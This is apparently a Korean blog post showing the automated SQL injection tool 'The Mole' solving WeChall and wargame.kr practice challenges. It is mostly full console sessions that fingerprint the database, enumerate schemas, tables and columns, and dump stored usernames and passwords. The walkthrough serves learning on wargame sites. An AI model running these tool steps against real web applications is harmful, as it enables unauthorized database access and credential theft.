SQL Injection 관련 툴이 있어 간단한 사용기를 작성합니다.
The Mole (Digging up your data) : http://themole.nasel.com.ar/
문제는 WeChall의 Table 이름을 찾는 문제를 대상으로 해당 툴을 이용해 풀이를 해보도록 하겠습니다.
실행 후 Tab 키를 누르면 여러 옵션을 설정할 수 있음을 알 수 있습니다.
옵션이 다양해서 아주 범용적으로 사용할 수 있을거 같네요.
C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|
Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!
#> url http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login
#> needle Welcome
#> injectable_field GET username
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[+] Found separator: "'"
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 3
[+] Trying finger 1/2
[+] Injectable fields found: [1, 3]
[i] Trying to inject in field 1
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------------+
| Databases |
+--------------------+
| gizmore_tableu61 |
| information_schema |
+--------------------+
#> tables gizmore_tableu61
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------+
| Tables |
+--------------+
| aaawrong |
| usertableus4 |
+--------------+
#> columns gizmore_tableu61 aaawrong
[+] Rows: 2
[*] Dumped 2/2 rows.
+----------------------------+
| Columns for table aaawrong |
+----------------------------+
| test |
| username |
+----------------------------+
#> query gizmore_tableu61 aaawrong test,username
+-----------------+
| test | username |
+-----------------+
+-----------------+
#> columns gizmore_tableu61 usertableus4
[+] Rows: 3
[*] Dumped 3/3 rows.
+--------------------------------+
| Columns for table usertableus4 |
+--------------------------------+
| message |
| password |
| username |
+--------------------------------+
#> query gizmore_tableu61 usertableus4 message,password,username
[+] Rows: 5
[*] Dumped 5/5 rows.
+------------------------------------------------------------------------------------------+
| message | password | username |
+------------------------------------------------------------------------------------------+
| Hello Peter><thismypass><Aaron A. Aaronson |
| Let`s have a bbq!><tamethepenguin><quangntenemy |
| This is a demo account, nothing here.><test><test |
| WTF><tables><nancy |
| Welcome Back><themoreyouknowthemoreyoucanforget><Admin |
+------------------------------------------------------------------------------------------+
#>
내친김에 wargame.kr 의 문제도 풀어보겠습니다. 여기 문제는 POST로 인자를 전송해야 합니다.
C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|
Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!
#> url http://wargame.kr:8084/prob/9/chk.php
#> method POST idx=1532
#> needle 2011-12-12 18:24:17
#> injectable_field POST idx
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[i] Trying separator: """
[i] Trying separator: " "
[+] Found separator: " "
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 1
[+] Trying finger 1/2
[+] Trying finger 2/2
[-] Could not find injectable field.
[+] Using blind mode.
[+] Found row count: 2
[+] Guessed length: 18
information_schema
[+] Guessed length: 11
p9_blueh4g3
+--------------------+
| Databases |
+--------------------+
| information_schema |
| p9_blueh4g3 |
+--------------------+
#> tables p9_blueh4g3
[+] Found row count: 2
[+] Guessed length: 11
admin_table
[+] Guessed length: 8
ip_table
+-------------+
| Tables |
+-------------+
| admin_table |
| ip_table |
+-------------+
#> columns p9_blueh4g3 admin_table
[+] Found row count: 3
[+] Guessed length: 3
idx
[+] Guessed length: 2
id
[+] Guessed length: 2
ps
+-------------------------------+
| Columns for table admin_table |
+-------------------------------+
| id |
| idx |
| ps |
+-------------------------------+
#> query p9_blueh4g3 admin_table id,idx,ps
[+] Found row count: 1
[+] Guessed length: 25
blue_admin><1><0h~myp4ss!
+-------------------------------+
| id | idx | ps |
+-------------------------------+
| blue_admin | 1 | 0h~myp4ss! |
+-------------------------------+
#>
아주 ㄷㄷㄷ한 툴이네요.